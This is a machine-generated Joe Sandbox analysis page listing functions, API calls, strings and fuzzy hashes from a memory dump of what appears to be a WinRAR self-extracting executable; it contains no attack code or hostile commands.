Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: b986b13abfc350b0916bee4bdf53e0605a93afec5997791336ba53634278c675
Instruction ID: 88f7d3009563fcda674e8b003ca1e5caa8be68578c441e57ebcbf79c7de94337
Opcode Fuzzy Hash: b986b13abfc350b0916bee4bdf53e0605a93afec5997791336ba53634278c675
Instruction Fuzzy Hash: 511126722043E07BE3216B729C8AFAF76DCEF54711F004161FA51A60D1DBA4CF0546B5

Function 00BF96F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00BF9705

Part of subcall function 00BF8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BFC896,00C03A34,00000000,00C03A34,00000000,?,00BFC8BD,00C03A34,00000007,00C03A34,?,00BFCCBA,00C03A34), ref: 00BF8DE2
Part of subcall function 00BF8DCC: GetLastError.KERNEL32(00C03A34,?,00BFC896,00C03A34,00000000,00C03A34,00000000,?,00BFC8BD,00C03A34,00000007,00C03A34,?,00BFCCBA,00C03A34,00C03A34), ref: 00BF8DF4

_free.LIBCMT ref: 00BF9711
_free.LIBCMT ref: 00BF971C
_free.LIBCMT ref: 00BF9727
_free.LIBCMT ref: 00BF9732
_free.LIBCMT ref: 00BF973D
_free.LIBCMT ref: 00BF9748
_free.LIBCMT ref: 00BF9753
_free.LIBCMT ref: 00BF975E
_free.LIBCMT ref: 00BF976C

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c8f38a6dd3ac2ba90b72366d89156ad2a05769e481ad9c200b815fbde0711b03
Instruction ID: 9655b784ee17d40955c1dddf1e9c23ba2163efb145cd3a700fb3b96c6b32ec79
Opcode Fuzzy Hash: c8f38a6dd3ac2ba90b72366d89156ad2a05769e481ad9c200b815fbde0711b03
Instruction Fuzzy Hash: 0111A47A11010DAFCB01EF94C842DE93BB5EF15390B5154A9FB088F262DE32DE589B84

Function 00BF2E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00BF2F50
___TypeMatch.LIBVCRUNTIME ref: 00BF305E
_UnwindNestedFrames.LIBCMT ref: 00BF31B0
CallUnexpected.LIBVCRUNTIME ref: 00BF31CB
_abort.LIBCMT ref: 00BF31D0

Strings

csm, xrefs: 00BF2F87
csm, xrefs: 00BF2EDB
csm, xrefs: 00BF2E6E

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: e4f8c0af8084f0c20caf0929e0b9cc8c1cdd26feb870ed7dc14cb37673f82b1d
Instruction ID: 33666b62f1a3c80ddb9f9e4159aa310e7a4ec48726a4aec20c7447b43bb3ff97
Opcode Fuzzy Hash: e4f8c0af8084f0c20caf0929e0b9cc8c1cdd26feb870ed7dc14cb37673f82b1d
Instruction Fuzzy Hash: 57B1347180020DEFCF29EFA4C8819BEBBF5EF14710B1441AAEA156B212D735DB59CB91

Function 00BD6FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BD6FAA
_wcslen.LIBCMT ref: 00BD7013
_wcslen.LIBCMT ref: 00BD7084

Part of subcall function 00BD7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00BD7AAB
Part of subcall function 00BD7A9C: GetLastError.KERNEL32 ref: 00BD7AF1
Part of subcall function 00BD7A9C: CloseHandle.KERNEL32(?), ref: 00BD7B00

Strings

SeCreateSymbolicLinkPrivilege, xrefs: 00BD6FCC
SeRestorePrivilege, xrefs: 00BD6FC2
UNC\, xrefs: 00BD7051
\??\, xrefs: 00BD702B

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3122303884-3508440684
Opcode ID: e1a6f2fbe51caff8a6430f808a1397b30674a5ef5e26ce9228046ba8c86aeb39
Instruction ID: e49c48cd6898e16c0646dbf3bf1e8d7a70614ed6fe47c852dfb22b1bb772b6ad
Opcode Fuzzy Hash: e1a6f2fbe51caff8a6430f808a1397b30674a5ef5e26ce9228046ba8c86aeb39
Instruction Fuzzy Hash: 2F41B7B1D4838479EB20A7749C82FEEF7EC9F14314F0445D7FA55A62C2FA749A488621

Function 00BEB5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD1316: GetDlgItem.USER32(00000000,00003021), ref: 00BD135A
Part of subcall function 00BD1316: SetWindowTextW.USER32(00000000,00C035F4), ref: 00BD1370

EndDialog.USER32(?,00000001), ref: 00BEB610
SendMessageW.USER32(?,00000080,00000001,?), ref: 00BEB637
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00BEB650
SetWindowTextW.USER32(?,?), ref: 00BEB661
GetDlgItem.USER32(?,00000065), ref: 00BEB66A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00BEB67E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00BEB694

Strings

LICENSEDLG, xrefs: 00BEB5D4

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 74dc12b1500cb121c3cf72fb6de72811d51e62e4732224dfd4f00042da02947f
Instruction ID: 596f36c7d711dfd8ada6be620317df03fd581d12033758189db0e8f656f6637d
Opcode Fuzzy Hash: 74dc12b1500cb121c3cf72fb6de72811d51e62e4732224dfd4f00042da02947f
Instruction Fuzzy Hash: C221F732614288BFD6219F77ED89F3F7BBCEB4AB41F010058F605A65E0CB629902D631

Function 00BEFD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,952405E3,00000001,00000000,00000000,?,?,00BDAF6C,ROOT\CIMV2), ref: 00BEFD99
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00BDAF6C,ROOT\CIMV2), ref: 00BEFE14
SysAllocString.OLEAUT32(00000000), ref: 00BEFE1F
_com_issue_error.COMSUPP ref: 00BEFE48
_com_issue_error.COMSUPP ref: 00BEFE52
GetLastError.KERNEL32(80070057,952405E3,00000001,00000000,00000000,?,?,00BDAF6C,ROOT\CIMV2), ref: 00BEFE57
_com_issue_error.COMSUPP ref: 00BEFE6A
GetLastError.KERNEL32(00000000,?,?,00BDAF6C,ROOT\CIMV2), ref: 00BEFE80
_com_issue_error.COMSUPP ref: 00BEFE93

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: c5da2e94f8219602713ff4cefd571522480beb5142deed1124d5ff8251d1a458
Instruction ID: 890012a1120f0ddcd5239f6c3562c1eb07f3b1003d8cd4e6e348c8b5a35ba6b6
Opcode Fuzzy Hash: c5da2e94f8219602713ff4cefd571522480beb5142deed1124d5ff8251d1a458
Instruction Fuzzy Hash: 9C41EB71A0029AABCB109F65CC45BBEBBE8EF48710F2042B9F915D7391D735A900C7A5

Function 00BDAF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BDAF29

Strings

SELECT * FROM Win32_OperatingSystem, xrefs: 00BDAFCA
WQL, xrefs: 00BDAFDC
Name, xrefs: 00BDB0B0
ROOT\CIMV2, xrefs: 00BDAF5C
Windows 10, xrefs: 00BDB0C2

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: H_prolog
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 3519838083-3505469590
Opcode ID: a29c45ed0f9396b75ab9600265084fc6559f9c6864028257335e7884d0384b27
Instruction ID: 93308de2b72f7f8526419c673530fb63bb5db2a4e364b6efd93a53765553437a
Opcode Fuzzy Hash: a29c45ed0f9396b75ab9600265084fc6559f9c6864028257335e7884d0384b27
Instruction Fuzzy Hash: 1D715E71A00659EFDF14DF64CC99EAEB7B9FF48710B15419AE512A73A0DB30AE01CB50

Function 00BD9382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BD9387
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00BD93AA
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00BD93C9

Part of subcall function 00BDC29A: _wcslen.LIBCMT ref: 00BDC2A2

Part of subcall function 00BE1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00BDC116,00000000,.exe,?,?,00000800,?,?,?,00BE8E3C), ref: 00BE1FD1

_swprintf.LIBCMT ref: 00BD9465

Part of subcall function 00BD4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD40A5

MoveFileW.KERNEL32(?,?), ref: 00BD94D4
MoveFileW.KERNEL32(?,?), ref: 00BD9514

Strings

rtmp%d, xrefs: 00BD944E

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 3726343395-3303766350
Opcode ID: 1b3e246f923158d25ff167b47db70714db4db089c277e3e47b6783267cbda174
Instruction ID: 18e9f13b8484785137ab425846ec0ff8d5d3cf9ba9f0a1a27eecc2a1e0ef2ada
Opcode Fuzzy Hash: 1b3e246f923158d25ff167b47db70714db4db089c277e3e47b6783267cbda174
Instruction Fuzzy Hash: B741637190025966DF21ABA1DC45EDEF3BCEF55344F0048E6B649E3251FB388B89CB60

Function 00BE1218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00BE122E

Part of subcall function 00BDB146: GetVersionExW.KERNEL32(?), ref: 00BDB16B

FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00BE1251
FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00BE1263
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00BE1274
SystemTimeToFileTime.KERNEL32(?,?), ref: 00BE1284
SystemTimeToFileTime.KERNEL32(?,?), ref: 00BE1294
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00BE12CF
__aullrem.LIBCMT ref: 00BE1379

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 942a122988d25df7eaae5392b548c884f4cba231ef1350e3a58f7d7881ea0a9a
Instruction ID: 79aaea082d9593b903ec08bc180c7bc25c35bf0d42e11183efa68afd38e4b4d7
Opcode Fuzzy Hash: 942a122988d25df7eaae5392b548c884f4cba231ef1350e3a58f7d7881ea0a9a
Instruction Fuzzy Hash: 4241F7B1508345AFC710DF69C884A6FBBE9FB88314F108D2EF596C2610E778E549DB52

Function 00BD2210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00BD2536

Part of subcall function 00BD4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD40A5

Part of subcall function 00BE05DA: _wcslen.LIBCMT ref: 00BE05E0

Strings

;%u, xrefs: 00BD2523
x%u, xrefs: 00BD26FD
xc%u, xrefs: 00BD275A

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf_wcslen
String ID: ;%u$x%u$xc%u
API String ID: 3053425827-2277559157
Opcode ID: e666734c8c3563c138d0e363306a5df4250191ebbac68c2b783684df215dddf9
Instruction ID: 3eb677966329f72204934822e3e8e8bad40d0fe43b0df5a2e3118f76f14ab066
Opcode Fuzzy Hash: e666734c8c3563c138d0e363306a5df4250191ebbac68c2b783684df215dddf9
Instruction Fuzzy Hash: CDF1E9706083C15BDB15DB248495BFAFBD59FA0300F0805EBEE869B383EB659945C7A2

Function 00BE9CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BE9D0A

Strings

</style>, xrefs: 00BE9E52
</p>, xrefs: 00BE9DE8
<style>, xrefs: 00BE9E30
<br>, xrefs: 00BE9DFE
>, xrefs: 00BE9D4B

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: d1b9223b6a95bf79e9a9f2cc64cf633e76edb6c054c536a7578361d487bbb8e4
Instruction ID: ee7740a0343dadec621b6073a5fe63db29e875f1f0dbb9012d41c9e876baf08a
Opcode Fuzzy Hash: d1b9223b6a95bf79e9a9f2cc64cf633e76edb6c054c536a7578361d487bbb8e4
Instruction Fuzzy Hash: 085127667403F295DB349A2B9C1177673E0DFA1750F6845BAFAC1CB1C0FBA58C8D82A1

Function 00BFF68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00BFFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00BFF6CF
__fassign.LIBCMT ref: 00BFF74A
__fassign.LIBCMT ref: 00BFF765
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00BFF78B
WriteFile.KERNEL32(?,00000000,00000000,00BFFE02,00000000,?,?,?,?,?,?,?,?,?,00BFFE02,00000000), ref: 00BFF7AA
WriteFile.KERNEL32(?,00000000,00000001,00BFFE02,00000000,?,?,?,?,?,?,?,?,?,00BFFE02,00000000), ref: 00BFF7E3

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: e23bbabb5b107eab4cf9662cb489cbaf718ce879ca92e6a48ae2700bda35d4e9
Instruction ID: 30823a768307041ba4cb6da2c83187c00201ed184461909745165b4e26028482
Opcode Fuzzy Hash: e23bbabb5b107eab4cf9662cb489cbaf718ce879ca92e6a48ae2700bda35d4e9
Instruction Fuzzy Hash: DE5165B19002499FDB10CFA8DC85BFEFBF8EF09710F14416AE655E7251E670A945CBA0

Function 00BF2900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00BF2937
___except_validate_context_record.LIBVCRUNTIME ref: 00BF293F
_ValidateLocalCookies.LIBCMT ref: 00BF29C8
__IsNonwritableInCurrentImage.LIBCMT ref: 00BF29F3
_ValidateLocalCookies.LIBCMT ref: 00BF2A48

Strings

csm, xrefs: 00BF29DD

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: a4ccf7d0eba24dd13e111a3d538dcab678cdf11c33181fd9ed4ce9a78f7dadca
Instruction ID: 277ca5a32a222163c0bdd9f36c859f3c2d0ae935ba1521cbb7195cda18efffbb
Opcode Fuzzy Hash: a4ccf7d0eba24dd13e111a3d538dcab678cdf11c33181fd9ed4ce9a78f7dadca
Instruction Fuzzy Hash: AC41B330A0020CAFCF10DF68C885AAEBBF5EF44324F14C1A5E915AB392D7719A19CF91

Function 00BE9ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 00BE9EEE
GetWindowRect.USER32(?,00000000), ref: 00BE9F44
ShowWindow.USER32(?,00000005,00000000), ref: 00BE9FDB
SetWindowTextW.USER32(?,00000000), ref: 00BE9FE3
ShowWindow.USER32(00000000,00000005), ref: 00BE9FF9

Strings

RarHtmlClassName, xrefs: 00BE9FA5

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 08602187ba809435380cf763a3ba6d1c05420cc91f4f02b0871d2bddf1af00e9
Instruction ID: bd30539fdb74e0fa19b4e663ac35280b60f53a434bddc76930da34690abc32ce
Opcode Fuzzy Hash: 08602187ba809435380cf763a3ba6d1c05420cc91f4f02b0871d2bddf1af00e9
Instruction Fuzzy Hash: 0D41C231504394EFDB219F66DC88B6F7BE8FF48701F004599F94AAA156CB74E908CBA1

Function 00BE9955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BE995E
_wcslen.LIBCMT ref: 00BE9993

Strings

 , xrefs: 00BE9A21
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00BE9987
<br>, xrefs: 00BE99DF
, xrefs: 00BE99B0

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: ef72d11b5552dcb95f010f0cbf2c111dc8f5b5319fda884a2cc1c048be0cabe6
Instruction ID: d0995fd4cb11ef05244c947a970c10177196cc32225657381f70123e8c0ddacc
Opcode Fuzzy Hash: ef72d11b5552dcb95f010f0cbf2c111dc8f5b5319fda884a2cc1c048be0cabe6
Instruction Fuzzy Hash: 99318F7664438596EA34EB559C42B7B73E4EF90720F60447FF986472C0FB61AD8C83A1

Function 00BFC8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

